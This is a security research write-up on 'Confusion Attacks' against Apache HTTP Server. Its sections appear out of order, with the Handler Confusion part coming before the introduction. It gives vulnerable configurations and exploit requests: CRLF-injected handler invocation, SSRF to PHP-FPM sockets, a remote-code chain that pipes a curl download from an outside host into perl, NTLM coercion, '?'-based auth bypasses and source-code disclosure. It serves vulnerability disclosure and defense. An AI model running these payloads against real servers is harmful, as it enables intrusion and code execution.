It’s worth mentioning that this side effect was corrected as a request parser bug in Apache HTTP Server 2.4.44, so the “vulnerability” was considered fixed until I picked it up again. However, since the root cause is still ModSecurity not handling errors properly, the same behavior can be reproduced if another code path that triggers AP_FILTER_ERROR is found.

P.S. This issue was reported to ModSecurity through the official security mail on 6/20, and the Project Co-Leader suggested returning to the original GitHub Issue for discussion.

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

Based on the double response behavior and its side effects mentioned earlier, this primitive could lead to other, even cooler exploitations. However, as this issue has not been fully fixed, further exploitation will be disclosed once it is fully resolved.


⚔️ Primitive 3-2. Invoke Arbitrary Handlers

Let’s think more carefully about the previous Overwrite Handler primitive. Although it is caused by ModSecurity not properly handling errors, which leaves the request with the wrong Content-Type, the deeper root cause is that Apache HTTP Server cannot distinguish the semantics of r->content_type when using it: the field can be set by a directive during the request phase, or it can serve as the Content-Type header of the server response.

Theoretically, if you can control the Content-Type header in the server response, you could invoke arbitrary module handlers through this legacy code snippet. This is the last primitive of Handler Confusion — invoking any internal module handler!

However, there’s still one last piece of the puzzle. In Httpd, all modifications to r->content_type from the server response occur after that legacy code. So, even if you can control the value of that field, at that point in the HTTP lifecycle, it’s too late to do further exploitation… is that right?

We turned to RFC 3875 for a rescue! RFC 3875 is a specification about CGI, and Section 6.2.2 defines a Local Redirect Response behavior:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Simply put, the specification mandates that under certain conditions, CGI must use Server-Side resources to handle redirects. A close examination of mod_cgi implementation of this specification reveals:

Path: modules/generators/mod_cgi.c#L983

if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf, // <------ [1]
                                                APLOG_MODULE_INDEX)))
{
    ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

    // [...]

    if (ret == HTTP_NOT_MODIFIED) {
        r->status = ret;
        return OK;
    }

    return ret;
}

location = apr_table_get(r->headers_out, "Location");

if (location && r->status == 200) {
    // [...]
}

if (location && location[0] == '/' && r->status == 200) { // <------ [2]
    /* This redirect needs to be a GET no matter what the original
     * method was.
     */
    r->method = "GET";
    r->method_number = M_GET;

    /* We already read the message body (if any), so don't allow
     * the redirected request to think it has one.  We can ignore
     * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
     */
    apr_table_unset(r->headers_in, "Content-Length");

    ap_internal_redirect_handler(location, r); // <------ [3]
    return OK;
}

Initially, mod_cgi executes [1] the CGI and scans its output to set the corresponding headers such as Status and Content-Type. If [2] the returned Status is 200 and the Location header starts with a /, the response is treated as a Server-Side Redirection and is processed [3] internally. A closer look at the implementation of ap_internal_redirect_handler() shows:

Path: modules/http/http_request.c#L800

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r); // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);     // <------ [2]
    access_status = ap_process_request_internal(new);  // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);        // <------ [4]
    }
    ap_die(access_status, new);
}

Httpd first creates [1] a new request structure and copies [2] the current r->content_type into it. After processing [3] the lifecycle, it calls [4] ap_invoke_handler(), the place that contains the legacy transformation. So, in Server-Side Redirects, if you can control the response headers, you can invoke any module handler within Httpd. Basically, all CGI implementations in Apache HTTP Server follow this behavior, and here’s a simple list:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi
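
The chain described above (CGI response, local redirect, copied Content-Type, legacy handler fallback) can be sketched in Python as follows. This is a toy model under simplifying assumptions: the `Request` class and `handle_cgi_response` function are hypothetical names, and step [3] of the real code, which runs the normal request phases on the new request, is left out.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Request:
    uri: str
    handler: Optional[str] = None
    content_type: Optional[str] = None


def handle_cgi_response(r: Request, status: int, headers: Dict[str, str]) -> Request:
    """Toy version of the local-redirect path taken after a CGI response."""
    r.content_type = headers.get("Content-Type", r.content_type)
    location = headers.get("Location")
    if status == 200 and location and location.startswith("/"):
        new = Request(uri=location)            # [1] fresh request for the new URI
        if r.handler:
            new.content_type = r.content_type  # [2] response value carried over
        # [4] legacy fallback: with no handler set, the content type is used
        new.handler = new.handler or new.content_type
        return new
    return r


original = Request(uri="/cgi-bin/redir.cgi", handler="cgi-script")
redirected = handle_cgi_response(
    original, 200, {"Location": "/ooo", "Content-Type": "server-status"}
)
print(redirected)
```

In this model the redirected request ends up with the handler named by the response’s Content-Type, which is the behavior the primitive relies on.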

How can this server-side redirect be triggered in real-world scenarios? Since you need control over at least the response’s Content-Type and part of the Location, here are two scenarios for reference:

  1. CRLF Injection in the CGI response headers, allowing overwriting of existing HTTP headers by new lines.
  2. SSRF that can completely control the response headers, such as a project hosted on mod_wsgi like django-revproxy.

The following examples are all based on this insecure CRLF Injection for the purpose of demonstration:

#!/usr/bin/perl
use CGI;

my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";

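
To show what the injected line breaks do to the script’s output, here is a small Python rendition of the same logic together with a deliberately naive header parser. Both `cgi_output` and `parse_headers` are hypothetical helpers written for this illustration; the parser assumes that a repeated header overwrites the earlier value and that the first blank line ends the header block. The payload is the CRLF sequence used in the demonstrations of this section, written without the spaces added for readability.

```python
from urllib.parse import unquote


def cgi_output(r_param: str) -> str:
    """Python rendition of the Perl script's header output."""
    out = ""
    if r_param.startswith(("http://", "https://")):
        out += f"Location: {r_param}\n"
    out += "Content-Type: text/html\n\n"
    return out


def parse_headers(raw: str) -> dict:
    """Naive parser: stop at the first blank line, later duplicates win."""
    headers = {}
    for line in raw.splitlines():
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


payload = unquote(
    "http://%0d%0aLocation:/ooo%0d%0aContent-Type:server-status%0d%0a%0d%0a"
)
headers = parse_headers(cgi_output(payload))
print(headers)
```

Under these assumptions the attacker-supplied Location and Content-Type replace the intended ones, and the script’s own Content-Type line falls after the injected blank line, so it is no longer part of the headers.
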
✔️ 3-2-1. Arbitrary Handler to Information Disclosure

Starting with invoking an arbitrary handler to disclose information, we use the built-in server-status handler in Apache HTTP Server, which is typically only allowed to be accessed locally:

<Location /server-status>
    SetHandler server-status
    Require local
</Location>

With the ability to invoke any handler, it becomes possible to overwrite the Content-Type to access sensitive information that should not be accessible remotely:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

It’s also easy to transform an image with a legitimate extension into a PHP backdoor. For instance, this primitive allows specifying mod_php to execute embedded malicious code within the image, like:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-3. Arbitrary Handler to Full SSRF

Calling mod_proxy to access any protocol on any URL is, of course, straightforward:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3f %0d%0a
%0d%0a

Moreover, this is a full-control SSRF: you can control all request headers and obtain the full HTTP response! A slight disappointment is that mod_proxy automatically adds an X-Forwarded-For header, so requests to Cloud Metadata are blocked by the metadata protection mechanisms of EC2 and GCP. Otherwise, this would be an even more powerful primitive.

✔️ 3-2-4. Arbitrary Handler to Access Local Unix Domain Socket

However, mod_proxy offers a more “convenient” feature: it can access local Unix Domain Sockets! 😉

Here’s a demonstration accessing PHP-FPM’s local Unix Domain Socket to execute a PHP backdoor located in /tmp/:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Theoretically, this technique has even more potential, such as protocol smuggling (smuggling FastCGI in HTTP/HTTPS protocols 😏) or exploiting other vulnerable local sockets. These possibilities are left for interested readers to explore.

✔️ 3-2-5. Arbitrary Handler to RCE

Finally, let’s demonstrate how to turn this primitive into RCE using a common CTF trick! Since the official PHP Docker image includes PEAR, a command-line PHP package management tool, using its pearcmd.php as an entry point allows further exploitation. For details, check the article Docker PHP LFI Summary, written by Phith0n!

Here we utilize a Command Injection within run-tests to complete the entire exploit chain, detailed as follows:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

It’s common to see CRLF Injection or Header Injection reported as XSS in Security Advisories or Bug Bounties. While it is true that these can sometimes be chained into impactful vulnerabilities like Account Takeover through SSO, please don’t forget that they can also lead to Server-Side RCE, as this demonstration shows!


🔥 4. Other Vulnerabilities

While this essentially covers the Confusion Attacks, some minor vulnerabilities discovered during our research of Apache HTTP Server are worth mentioning separately.


⚔️ CVE-2024-38472 - Windows UNC-based SSRF

Firstly, the Windows implementation of the apr_filepath_merge() function accepts UNC paths, which lets attackers coerce NTLM authentication to any host. Here we list two different triggering paths:

✔️ Triggered via HTTP Request Parser

Direct triggering through the HTTP request parser in Httpd requires additional configuration. This might seem impractical at first glance, but the setting often appears alongside Tomcat (mod_jk, mod_proxy_ajp) or together with PATH_INFO:

AllowEncodedSlashes On

Additionally, since Httpd rewrote its core HTTP request parser logic after 2.4.49, triggering the vulnerability in newer versions requires one more directive:

AllowEncodedSlashes On
MergeSlashes Off

Using two %5C forces Httpd to send NTLM authentication to an attacker-controlled server, and in practice this SSRF can be converted into RCE through NTLM Relay!

$ curl http://server/%5C%5Cattacker-server/path/to

✔️ Triggered via Type-Map

In the Debian/Ubuntu distribution of Httpd, Type-Map is enabled by default:

AddHandler type-map var

By uploading a .var file to the server and setting the URI field to a UNC path, you can also force the server to coerce NTLM authentication to the attacker. This is also the second .var trick I proposed. 😉


⚔️ CVE-2024-39573 - SSRF via Full Control of RewriteRule Prefix

Lastly, when the prefix of a RewriteRule substitution target in Server Config or VirtualHost context is fully controllable, you can invoke mod_proxy and its sub-modules:

RewriteRule ^/broken(.*) $1

Using the following URL can delegate the request to mod_proxy for processing:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to

But if administrators had tested such a rule properly, they would have realized it is impractical. Thus, it was originally reported together with another vulnerability as an exploit chain, but the security team also treated this behavior as a security boundary fix. After the patches came out, other researchers applied the same behavior to Windows UNC paths and obtained an additional CVE.


Future Works

Finally, let’s talk about future works and areas for improvement in this research. Confusion Attacks are still a very promising attack surface, especially since my research focused mainly on just two fields. Unless the Apache HTTP Server undergoes architectural improvements or provides better development standards, I believe we’ll see more “confusions” in the future!

So, what other areas could be enhanced? In reality, different Httpd distributions have different configurations, so other Unix-Like systems such as the RHEL series, BSD family, and even applications that utilize Httpd might have more escapable RewriteRule, more powerful local gadgets, and unexpected symbolic jumps. These are all left for those interested to continue exploring.

Due to time constraints, I was unable to share more real-world cases found and exploited in actual websites, devices, or even open-source projects. However, you can probably imagine — the real world is still full of countless unexplored rules, bypassable authentications, and hidden CGIs waiting to be uncovered. How to hunt these techniques worldwide? That’s your mission!


Conclusion

Maintaining an open-source project is truly challenging, especially when trying to balance user convenience with the compatibility of older versions. A slight oversight can lead to the entire system being compromised, such as what happened with Httpd 2.4.49, where a minor change in path processing logic led to the disastrous CVE-2021-41773. The entire development process must be carefully built upon a pile of legacy code and technical debt. So, if any Apache HTTP Server developers are reading this: Thank you for your hard work and contributions!

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Orange Tsai (@orange_8361)  |  Traditional Chinese Version  |  English Version

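Hi, this is my research on Apache HTTP Server, presented at Black Hat USA 2024 this year. The research will also be presented at HITCON and OrangeCon. If you would like an early look, the slides are available here: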

Confusion Attacks: Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!

Thanks also to Akamai for their friendly outreach! They released mitigation measures immediately after this research was published (see Akamai’s blog for details).


TL;DR

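This article explores architectural issues in Apache HTTP Server and introduces several pieces of technical debt within Httpd, including 3 types of Confusion Attacks, 9 new vulnerabilities, 20 exploitation techniques, and over 30 case studies. The content includes, but is not limited to:

  1. How a single ? can bypass Httpd’s built-in access control and authentication.
  2. How unsafe RewriteRules can escape the Web Root and access the entire filesystem.
  3. How to leverage a piece of code left over from 1996 to transform an XSS into RCE.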


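Outline


Before the Story

This section is just some personal murmurs. If you are only interested in the technical details, jump straight to: How Did the Story Begin?

As a researcher, perhaps the greatest joy is seeing your work noticed and understood by your peers. So after completing a piece of research with fruitful results, it is natural to want the world to see it, which is why I have presented multiple times at Black Hat USA and DEFCON. As you might know, since 2022 I have been unable to obtain a valid travel authorization to enter the US (for Taiwan, which is in the Visa Waiver Program, the authorization can usually be obtained online within minutes to hours), which made me miss the in-person talk at Black Hat USA 2022. Even on my solo trip to Peru and Easter Island in 2023, I could not transit through the US :(

To resolve this, I started preparing for a B1/B2 visa in January this year: writing various documents, interviewing at the embassy, and waiting endlessly. It was not fun. But to have my work seen, I still spent a lot of time running around for the visa and seeking every possibility. Even three weeks before the conference, it was unclear whether my talk would be canceled (BH initially accepted only in-person talks, but thanks to the review board’s recognition of this research, it could eventually be presented in a pre-recorded format). So everything you see, including the slides, the video, and this blog, was completed within just a few dozen days. 😖

I am just a plain researcher with a clear conscience, and my attitude toward vulnerabilities has always been that they should be reported to the vendor and fixed. I am not writing these words for any particular reason, only to record some feelings of helplessness, the efforts made this year, and my thanks to those who helped me along the way. Thank you all :)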


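How Did the Story Begin?

Around the beginning of this year, I started thinking about my next research target. As you might know, I always aim to challenge big targets that affect the entire internet, so I began looking for complex topics or interesting open-source projects such as Nginx and PHP, and even delved into RFCs to strengthen my understanding of protocol implementation details.

Most attempts ended in failure (though a few might become topics for future blog posts 😉). But while savoring this code, I recalled that I had briefly looked at the Apache HTTP Server source code in the middle of last year! I did not read deeply into it then because of my work schedule, but even at that time I had already “smelled” something not quite right in its coding style.

So this year, I decided to continue: to turn “why does it smell odd” from an indescribable “feeling” into something concrete, and dive deep into Apache HTTP Server!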


Why Does Apache HTTP Server Smell Bad?

First, Apache HTTP Server is a world built from “modules,” and its official documentation shows pride in this modular design (MPMs - Multi-Processing Modules):

Apache httpd has always accommodated a wide variety of environments through its modular design. […] Apache HTTP Server 2.0 extends this modular design to the most basic functions of a web server.

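The entire Httpd service relies on hundreds of small modules working together to handle a client’s HTTP request. Of the 136 modules listed in the official documentation, nearly half are enabled by default or frequently used.

Even more surprising, while handling client HTTP requests, all these modules also jointly maintain one colossal request_rec structure. This structure includes every element involved in handling HTTP, and its detailed definition can be found in include/httpd.h. All modules depend on this massive structure to synchronize, communicate, and even exchange data. The structure is tossed around between modules like a ball in a game of catch, and each module can modify any value in it as it pleases!

This style of collaboration is nothing new from a software engineering perspective: each individual only needs to focus on its own duty, and as long as everyone finishes their own work, clients can enjoy the service Httpd provides. This division of labor may work fine among a handful of modules, but what happens when we scale it up to hundreds of modules collaborating? Can they really work well together? 🤔

So our starting point is simple: the modules do not fully understand each other’s implementation details, yet they are required to cooperate. Each module may have been implemented by a different developer, with code that has gone through years of iteration, refactoring, and modification. Do they really still know what they are doing? Even if they know themselves perfectly, what about the other modules? Without a good development standard or usage guideline, there must be many small gaps we can exploit!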


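About the New Attack Surface: Confusion Attacks

Based on these observations, we started focusing on the “relationships” and “interactions” among these modules. If a module accidentally modifies a structure field that it considers unimportant but that is crucial to another module, it may affect that module’s decisions. Going further, if Apache HTTP Server’s definitions of these fields are not precise enough, so that different modules hold fundamentally inconsistent understandings of the same field, that too can lead to security risks!

From this starting point, we developed three different types of attacks. Because these attacks are all more or less related to modules misusing structure fields, we named this attack surface “Confusion Attack.” The attacks we developed are: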

  1. Filename Confusion
  2. DocumentRoot Confusion
  3. Handler Confusion

Through these attacks, we identified 9 different vulnerabilities:

  1. CVE-2024-38472 - Apache HTTP Server on Windows UNC SSRF
  2. CVE-2024-39573 - Apache HTTP Server proxy encoding problem
  3. CVE-2024-38477 - Apache HTTP Server: Crash resulting in Denial of Service in mod_proxy via a malicious request
  4. CVE-2024-38476 - Apache HTTP Server may use exploitable/malicious backend application output to run local handlers via internal redirect
  5. CVE-2024-38475 - Apache HTTP Server weakness in mod_rewrite when first segment of substitution matches filesystem path
  6. CVE-2024-38474 - Apache HTTP Server weakness with encoded question marks in backreferences
  7. CVE-2024-38473 - Apache HTTP Server proxy encoding problem
  8. CVE-2023-38709 - Apache HTTP Server: HTTP response splitting
  9. CVE-2024-?????? - [redacted]

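These vulnerabilities were all reported through the official security mailing list and were addressed by the Apache HTTP Server team in the security advisory and 2.4.60 update published on 2024-07-01 (see the official announcement for details).

Since this is a new attack surface arising from Httpd’s architecture and internal mechanisms, naturally the first person to explore it can find the most vulnerabilities, so I currently hold the most CVEs for Apache HTTP Server 😉. As a result, many of the fixes cannot be backward compatible because of the historical architecture. For many long-running production servers, patching is therefore not easy: if administrators update without careful consideration, the update may break existing configurations and cause service downtime. 😨

Now, let’s start introducing the attacks we developed!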


🔥 1. Filename Confusion

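The first is the confusion based on the Filename field. Literally, r->filename should be a filesystem path. In Httpd, however, some modules treat it as a URL. If, within the context of an HTTP request, some modules treat r->filename as a filesystem path while others treat it as a URL, this inconsistency leads to security issues!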


⚔️ Primitive 1-1. Truncation

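So which modules treat r->filename as a URL? The first is mod_rewrite, which lets site administrators easily rewrite a path according to specified rules using the RewriteRule directive: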

RewriteRule Pattern Substitution [flags]

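The substitution target can be either a filesystem path or a URL. This is probably a convenience made for the sake of user experience, but the “convenience” also introduces risks. For instance, when rewriting a path, mod_rewrite forcibly treats the result as a URL (splitout_queryargs()), which means that in an HTTP request a question mark %3F can truncate the path or URL that follows it in the RewriteRule, leading to the following two exploitation techniques.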

Path: modules/mappers/mod_rewrite.c#L4141

/*
 * Apply a single RewriteRule
 */
static int apply_rewrite_rule(rewriterule_entry *p, rewrite_ctx *ctx)
{
    ap_regmatch_t regmatch[AP_MAX_REG_MATCH];
    apr_array_header_t *rewriteconds;
    rewritecond_entry *conds;

    // [...]

    for (i = 0; i < rewriteconds->nelts; ++i) {
        rewritecond_entry *c = &conds[i];
        rc = apply_rewrite_cond(c, ctx);

        // [...] do the remaining stuff

    }

    /* Now adjust API's knowledge about r->filename and r->args */
    r->filename = newuri;

    if (ctx->perdir && (p->flags & RULEFLAG_DISCARDPATHINFO)) {
        r->path_info = NULL;
    }

    splitout_queryargs(r, p->flags);  // <------- [!!!] Truncate the `r->filename`

    // [...]
}

✔️ 1-1-1. Path Truncation

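The first technique is the truncation of a filesystem path. Imagine the following RewriteRule:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

The server opens the corresponding profile based on the username that follows the /user/ path, for example: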

$ curl http://server/user/orange
 # the output of file `/var/user/orange/profile.yml`

Since mod_rewrite forcibly treats the rewritten result as a URL, even though the target is a filesystem path, a question mark can truncate the trailing /profile.yml, for example:

$ curl http://server/user/orange%2Fsecret.yml%3F
 # the output of file `/var/user/orange/secret.yml`

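This is our first technique: Path Truncation. Let’s pause our exploration of it here for now. Although it may look like a minor flaw at the moment, keep it in mind, because it will reappear in later attacks and gradually tear open this seemingly useless little breach! 😜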

✔️ 1-1-2. Mislead RewriteFlag Assignment

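The second use of the truncation primitive is to mislead the assignment of RewriteFlags. Imagine a site administrator managing paths and their corresponding modules with the following RewriteRule:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

If a request ends with the .php extension, the handler corresponding to mod_php is attached (the flag can also set an environment variable or a Content-Type; see the official RewriteRule Flags manual for details).

Since the truncation in mod_rewrite happens after the regular expression match, an attacker can use the original rule and a ? to apply RewriteFlags to requests they were never meant for. For example, upload a GIF image carrying malicious PHP code and execute it as a backdoor through a crafted request: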

$ curl http://server/upload/1.gif
 # GIF89a <?=`id`;>
$ curl http://server/upload/1.gif%3fooo.php
 # GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)
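
The ordering issue, where the pattern is matched first and the truncation happens afterwards, can be sketched in Python. This is a toy model of the rule above, not mod_rewrite itself; `apply_rule` is a hypothetical helper and the URL decoding is simplified.

```python
import re
from urllib.parse import unquote

# Toy stand-in for: RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
RULE = re.compile(r"^(.+\.php)$")


def apply_rule(raw_path: str):
    """Return (filename, handler) as this simplified model would compute them."""
    path = unquote(raw_path)
    handler = None
    match = RULE.match(path)
    if match:
        # The flag is applied because the pattern matched the full string...
        handler = "application/x-httpd-php"
        # ...and only afterwards is everything from '?' onward cut off.
        path = match.group(1).partition("?")[0]
    return path, handler


print(apply_rule("/upload/1.gif"))
print(apply_rule("/upload/1.gif%3fooo.php"))
```

In the second call the pattern sees a string ending in .php, so the PHP handler is attached, yet the file that is finally served is the uploaded GIF.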


⚔️ Primitive 1-2. ACL Bypass

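The second primitive of Filename Confusion occurs in mod_proxy. Whereas the previous primitive unconditionally treats the target as a URL, this time the authentication and access control bypass is caused by modules interpreting r->filename inconsistently.

It actually makes sense for mod_proxy to treat r->filename as a URL, since the whole purpose of a proxy is to “redirect” requests to other URLs. But security is often about components that look fine in isolation and break when combined! This is especially true when most modules treat r->filename as a filesystem path by default. Suppose you use an access control module based on the filesystem, and mod_proxy now treats r->filename as a URL: this inconsistency can lead to access control or authentication being bypassed!

A classic example is a site administrator using the Files directive to restrict a single file, such as admin.php:

<Files "admin.php">
    AuthType Basic
    AuthName "Admin Panel"
    AuthUserFile "/etc/apache2/.htpasswd"
    Require valid-user
</Files>

In a default PHP-FPM installation, this configuration can be bypassed directly! Incidentally, this is also the most common way to configure authentication in Apache HTTP Server! Suppose you visit a URL like this: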

http://server/admin.php%3Fooo.php

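During the HTTP lifecycle of this request, the authentication module first compares the requested filename with the protected file. At this point the r->filename field is admin.php?ooo.php, which obviously does not match admin.php, so the module concludes that the request needs no authentication. However, the PHP-FPM configuration uses the SetHandler directive to hand any request ending in .php to mod_proxy: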

Path: /etc/apache2/mods-enabled/php8.2-fpm.conf

# Using (?:pattern) instead of (pattern) is a small optimization that
# avoid capturing the matching pattern (as $1) which isn't used here
<FilesMatch ".+\.ph(?:ar|p|tml)$">
    SetHandler "proxy:unix:/run/php/php8.2-fpm.sock|fcgi://localhost"
</FilesMatch>

mod_proxy rewrites r->filename into the following URL and, based on the scheme in it, calls the sub-module mod_proxy_fcgi to handle the subsequent FastCGI protocol logic:

proxy:fcgi://127.0.0.1:9000/var/www/html/admin.php?ooo.php

Because the filename is already in an odd format by the time the backend receives it, PHP-FPM has to handle this case specially. The logic is as follows:

Path: sapi/fpm/fpm/fpm_main.c#L1044

#define APACHE_PROXY_FCGI_PREFIX "proxy:fcgi://"
#define APACHE_PROXY_BALANCER_PREFIX "proxy:balancer://"

if (env_script_filename &&
    strncasecmp(env_script_filename, APACHE_PROXY_FCGI_PREFIX, sizeof(APACHE_PROXY_FCGI_PREFIX) - 1) == 0) {
    /* advance to first character of hostname */
    char *p = env_script_filename + (sizeof(APACHE_PROXY_FCGI_PREFIX) - 1);
    while (*p != '\0' && *p != '/') {
        p++;    /* move past hostname and port */
    }
    if (*p != '\0') {
        /* Copy path portion in place to avoid memory leak.  Note
         * that this also affects what script_path_translated points
         * to. */
        memmove(env_script_filename, p, strlen(p) + 1);
        apache_was_here = 1;
    }
    /* ignore query string if sent by Apache (RewriteRule) */
    p = strchr(env_script_filename, '?');
    if (p) {
        *p = 0;
    }
}

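As you can see, PHP-FPM normalizes the filename and splits it at the question mark ? to extract the actual file path, which it then executes (here /var/www/html/admin.php). So basically every authentication or access control rule that uses the Files directive to protect a single PHP file is at risk when running PHP-FPM! 😮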
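
The disagreement between the three components can be summarised in a short Python sketch. It is a simplified model, not code from Apache or PHP: the helper names are hypothetical, and it assumes that `<Files>` and `<FilesMatch>` are evaluated against the last path component of `r->filename`.

```python
import posixpath
import re

PROTECTED = "admin.php"                           # <Files "admin.php">
FPM_MATCH = re.compile(r".+\.ph(?:ar|p|tml)$")    # <FilesMatch> from the PHP-FPM config


def needs_auth(filename):
    """Model of <Files>: compare against the last component of r->filename."""
    return posixpath.basename(filename) == PROTECTED


def routed_to_fpm(filename):
    """Model of <FilesMatch>: regex search on the last component."""
    return FPM_MATCH.search(posixpath.basename(filename)) is not None


def script_run_by_fpm(filename):
    """PHP-FPM drops everything from the first '?' before opening the script."""
    return filename.split("?", 1)[0]


filename = "/var/www/html/admin.php?ooo.php"      # r->filename for /admin.php%3Fooo.php
print(needs_auth(filename), routed_to_fpm(filename), script_run_by_fpm(filename))
```

In this model the request is not considered protected, is still routed to PHP-FPM, and ends up executing `/var/www/html/admin.php`.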

Many potentially risky configurations can be found on GitHub, such as a phpinfo() page restricted to the internal network:

# protect phpinfo, only allow localhost and local network access
<Files php-info.php>
    # LOCAL ACCESS ONLY
    # Require local

    # LOCAL AND LAN ACCESS
    Require ip 10 172 192.168
</Files>

Adminer blocked through .htaccess:

<Files adminer.php>
    Order Allow,Deny
    Deny from all
</Files>

A protected xmlrpc.php:

<Files xmlrpc.php>
    Order Allow,Deny
    Deny from all
</Files>

A command-line tool protected from direct access:

<Files "cron.php">
    Deny from all
</Files>

Because the authentication module and mod_proxy interpret the r->filename field differently, every one of the examples above can be bypassed with a single ?.


🔥 2. DocumentRoot Confusion

Next up is the Confusion Attack based on DocumentRoot! First, consider the following Httpd configuration:

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

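When you visit http://server/html/about, which file does Httpd actually open? Is it /about.html under the filesystem root, or /var/www/html/about.html under the DocumentRoot?

The answer is: it accesses both paths. This is our second Confusion Attack. For any[1] RewriteRule, Httpd always tries to open both the path with the DocumentRoot and the path without it! Interesting, right? 😉

[1] Located in Server Config or VirtualHost Block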

Path: modules/mappers/mod_rewrite.c#L4939

    if (!(conf->options & OPTION_LEGACY_PREFIX_DOCROOT)) {
        uri_reduced = apr_table_get(r->notes, "mod_rewrite_uri_reduced");
    }

    if (!prefix_stat(r->filename, r->pool) || uri_reduced != NULL) {    // <------ [1] access without root
        int res;
        char *tmp = r->uri;

        r->uri = r->filename;
        res = ap_core_translate(r);             // <------ [2] access with root
        r->uri = tmp;

        if (res != OK) {
            rewritelog((r, 1, NULL, "prefixing with document_root of %s"
                        " FAILED", r->filename));

            return res;
        }

        rewritelog((r, 2, NULL, "prefixed with document_root to %s",
                    r->filename));
    }

    rewritelog((r, 1, NULL, "go-ahead with %s [OK]", r->filename));
    return OK;
}
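
The decision in the snippet above can be approximated in Python. This is a sketch under simplifying assumptions, not a port of the C code: `resolve` and `first_segment` are hypothetical helpers, and the `exists` callback stands in for the `prefix_stat()` check, which is modelled here as testing only the leading directory of the rewritten path.

```python
import posixpath

DOCUMENT_ROOT = "/var/www/html"


def first_segment(path):
    """Return the leading directory of an absolute path, e.g. '/usr' for '/usr/share/x'."""
    return "/" + path.lstrip("/").split("/", 1)[0]


def resolve(rewritten, exists):
    """Pick the path that is served for a rewritten target in this simplified model."""
    if exists(first_segment(rewritten)):
        return rewritten                                   # used as-is, outside DocumentRoot
    return posixpath.join(DOCUMENT_ROOT, rewritten.lstrip("/"))


existing = {"/usr", "/etc", "/var"}                        # pretend filesystem root
print(resolve("/about.html", existing.__contains__))
print(resolve("/usr/share/doc/x.html", existing.__contains__))
```

With this pretend filesystem, `/about.html` falls back to the DocumentRoot while `/usr/share/doc/x.html` is taken literally.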

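Of course, in most cases the target file does not exist, so Httpd accesses the version with the DocumentRoot. But this behaviour already lets us "deliberately" access paths outside the Web Root. If we can control the prefix of the RewriteRule target, can we not browse any file on the operating system? That is the spirit of our second Confusion Attack! Countless problematic rules can be found on GitHub, and amusingly, even the example in the official documentation is vulnerable:

# Remove mykey=???
RewriteCond "%{QUERY_STRING}" "(.*(?:^|&))mykey=([^&]*)&?(.*)&?$"
RewriteRule "(.*)" "$1?%1%3"

Other RewriteRules are affected as well, such as URL Masking rules used for caching or for hiding file extensions:

RewriteRule "^/html/(.*)$" "/$1.html"

Rules that try to save bandwidth by serving compressed versions of static files:

RewriteRule "^(.*)\.(css|js|ico|svg)" "$1\.$2.gz"

Rules that redirect an old website to the root directory:

RewriteRule "^/oldwebsite/(.*)$" "/$1"

Rules that return 200 OK for every CORS preflight request:

RewriteCond %{REQUEST_METHOD} OPTIONS
RewriteRule ^(.*)$ $1 [R=200,L]

In theory, as long as the prefix of the RewriteRule target is controllable, we can browse almost the entire filesystem. But the rules above reveal one more restriction we have to get past: suffixes such as .html and .gz limit our freedom. So can this restriction be bypassed? You may remember the path truncation introduced in the Filename Confusion section. By combining the two attacks, we can freely browse any file on the operating system!

The following examples are all based on this unsafe RewriteRule:

RewriteEngine On
RewriteRule "^/html/(.*)$" "/$1.html"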


⚔️ Primitive 2-1. Server-Side Source Code Disclosure

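Let's start with the first primitive of DocumentRoot Confusion: arbitrary server-side source code disclosure!

Httpd decides whether to treat a file as a Server-Side Script based on the current directory or virtual host configuration. Accessing the target code through an absolute path therefore confuses Httpd's logic and leaks the contents of files that should have been executed as code.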

✔️ 2-1-1. Disclose CGI Source Code

First is leaking server-side CGI source code. mod_cgi binds the CGI directory to a specified URL prefix through ScriptAlias, so when the CGI file is visited directly through its absolute path, the URL prefix is different and the file's source code is leaked.

$ curl http://server/cgi-bin/download.cgi
 # the processed result from download.cgi
$ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
 # #!/usr/bin/perl
 # use CGI;
 # ...
